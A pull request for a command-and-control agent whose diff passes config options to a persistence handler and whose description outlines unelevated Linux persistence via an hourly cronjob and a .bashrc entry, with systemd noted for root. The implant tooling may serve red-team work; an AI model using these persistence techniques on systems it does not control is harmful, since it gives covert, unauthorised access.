### PR TITLE
Implement Linux persistence (unelevated)

### DIFF
--- a/agent/src/cmd/mod.rs
+++ b/agent/src/cmd/mod.rs
@@ -99,7 +99,7 @@ impl NotionCommand {
             CommandType::Download(s) => download::handle(&s).await,
             CommandType::Getprivs    => getprivs::handle().await,
             CommandType::Inject(s)   => inject::handle(&s).await,
-            CommandType::Persist(s)  => persist::handle(&s).await,
+            CommandType::Persist(s)  => persist::handle(&s, config_options).await,
             CommandType::Portscan(s) => portscan::handle(&s).await,
             CommandType::Ps          => ps::handle().await,
             CommandType::Pwd         => pwd::handle().await,


### PR DESCRIPTION
It's a bit shell-heavy, but this implements the copy of the agent and config to `~/.notion/`. 

* `cron` creates an hourly cronjob to start the agent.
* `bashrc` adds to the user's `.bashrc` file to start the agent on next use of the bash shell.

These are solid options for unelevated persistence. With root, systemd is the likely best option.